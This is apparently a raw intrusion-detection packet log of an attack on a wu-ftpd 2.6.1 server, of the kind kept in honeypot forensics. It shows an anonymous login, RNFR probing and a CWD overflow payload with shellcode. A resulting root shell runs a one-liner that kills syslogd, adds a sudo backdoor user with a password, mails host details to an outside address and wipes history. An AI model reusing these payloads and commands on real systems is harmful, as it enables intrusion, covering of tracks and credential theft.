02/22-04:56:10.750441 192.168.20.1:21 -> 64.85.226.218:1071
TCP TTL:64 TOS:0x0 ID:41122 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x77789736  Ack: 0x88FB971  Win: 0x16D0  TcpLen: 20
220 pc88 FTP server (Version wu-2.6.1-16) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:11.169921 64.85.226.218:1071 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:556 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x88FB971  Ack: 0x77789768  Win: 0x443E  TcpLen: 20
USER anonymous..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:11.174181 192.168.20.1:21 -> 64.85.226.218:1071
TCP TTL:64 TOS:0x0 ID:41124 IpLen:20 DgmLen:108 DF
***AP*** Seq: 0x77789768  Ack: 0x88FB981  Win: 0x16D0  TcpLen: 20
331 Guest login ok, send your complete e-mail address as passwor
d...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:11.593558 64.85.226.218:1071 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:557 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x88FB981  Ack: 0x777897AC  Win: 0x43FA  TcpLen: 20
PASS l33ch@nowhere.org..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:11.605437 192.168.20.1:21 -> 64.85.226.218:1071
TCP TTL:64 TOS:0x0 ID:41125 IpLen:20 DgmLen:88 DF
***AP*** Seq: 0x777897AC  Ack: 0x88FB999  Win: 0x16D0  TcpLen: 20
230 Guest login ok, access restrictions apply...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

...

...


02/22-04:56:40.659689 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:2676 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x8F72010  Ack: 0x7896AABB  Win: 0x4316  TcpLen: 20
RNFR ././.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:40.660255 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60279 IpLen:20 DgmLen:85 DF
***AP*** Seq: 0x7896AABB  Ack: 0x8F7201A  Win: 0x16D0  TcpLen: 20
350 File exists, ready for destination name..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:41.095558 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:2948 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x8F7201A  Ack: 0x7896AAE8  Win: 0x42E9  TcpLen: 20
RNFR ././.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:41.096275 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60280 IpLen:20 DgmLen:85 DF
***AP*** Seq: 0x7896AAE8  Ack: 0x8F72024  Win: 0x16D0  TcpLen: 20
350 File exists, ready for destination name..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:56:41.636915 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:3229 IpLen:20 DgmLen:50 DF
***AP*** Seq: 0x8F72024  Ack: 0x7896AB15  Win: 0x42BC  TcpLen: 20
RNFR ././.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


...
...


TCP TTL:106 TOS:0x60 ID:21642 IpLen:20 DgmLen:548 DF
***AP*** Seq: 0x8F722C6  Ack: 0x7896B6FB  Win: 0x4262  TcpLen: 20
CWD 000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000..............@1..._........................................
................................................................
................................................................
............1.C..tQ.-....P..j.X......1.....Yj.X.............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:57:14.792272 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60352 IpLen:20 DgmLen:561 DF
***AP*** Seq: 0x7896B6FB  Ack: 0x8F724C2  Win: 0x1920  TcpLen: 20
550 000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000........@1..._..............................................
................................................................
................................................................
......1.C..tQ.-....P..j.X......1.....Yj.X.........: File name to
o long...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


02/22-04:57:29.073019 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:26541 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x8F72515  Ack: 0x7896BA0E  Win: 0x3F4F  TcpLen: 20
RNFR ./././././././..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

....


02/22-04:57:30.426049 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:26844 IpLen:20 DgmLen:544 DF
***AP*** Seq: 0x8F72579  Ack: 0x7896BA3F  Win: 0x3F1E  TcpLen: 20
unset HISTFILE;unset HISTSAVE;id;uname -a;killall -9 syslogd;/us
r/sbin/adduser -c MSSQL_SERVER mssql >/dev/null 2>&1;echo "yeahb
aby" | passwd --stdin mssql >/dev/null 2>&1;echo "mssql    ALL=(
ALL) ALL" >> /etc/sudoers 2>/dev/null;mkdir /dev/rd/c7d9p9 >/dev
/null 2>&1;echo "-[ Host: `/sbin/ifconfig` `hostname -f` `hostna
me -i` `hostname` ]- -[ USER: mssql PASS: yeahbaby ]-" | mail -s
 "rooted wuftpdserver" [--delete--]@yahoo.com;echo "DONE" >/dev
/null 2>&1; echo > /root/.bash_history >/dev/null 2>&1;.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:57:30.439045 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60368 IpLen:20 DgmLen:79 DF
***AP*** Seq: 0x7896BA3F  Ack: 0x8F72771  Win: 0x1D50  TcpLen: 20
uid=0(root) gid=0(root) groups=50(ftp).
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-04:57:31.028118 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60369 IpLen:20 DgmLen:103 DF
***AP*** Seq: 0x7896BA66  Ack: 0x8F72771  Win: 0x1D50  TcpLen: 20
Linux pc88 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-05:00:41.994481 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:27399 IpLen:20 DgmLen:43 DF
***AP*** Seq: 0x8F72771  Ack: 0x7896BAA5  Win: 0x4470  TcpLen: 20
ls.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-05:00:42.010905 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60370 IpLen:20 DgmLen:63 DF
***AP*** Seq: 0x7896BAA5  Ack: 0x8F72774  Win: 0x1D50  TcpLen: 20
bin.etc.lib.pub.upload.

02/22-05:00:45.957377 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:27414 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x8F72774  Ack: 0x7896BABC  Win: 0x4459  TcpLen: 20
finger mssql.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-05:00:45.979400 192.168.20.1:21 -> 64.85.226.218:1073
TCP TTL:64 TOS:0x0 ID:60371 IpLen:20 DgmLen:179 DF
***AP*** Seq: 0x7896BABC  Ack: 0x8F72781  Win: 0x1D50  TcpLen: 20
Login: mssql          ...Name: MSSQL_SERVER..Directory: /home/ms
sql              .Shell: /sbin/bash..Never logged in...No mail..
.No Plan...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

02/22-05:00:51.223192 64.85.226.218:1073 -> 192.168.20.1:21
TCP TTL:106 TOS:0x60 ID:27429 IpLen:20 DgmLen:45 DF
***AP*** Seq: 0x8F72781  Ack: 0x7896BB47  Win: 0x43CE  TcpLen: 20
exit.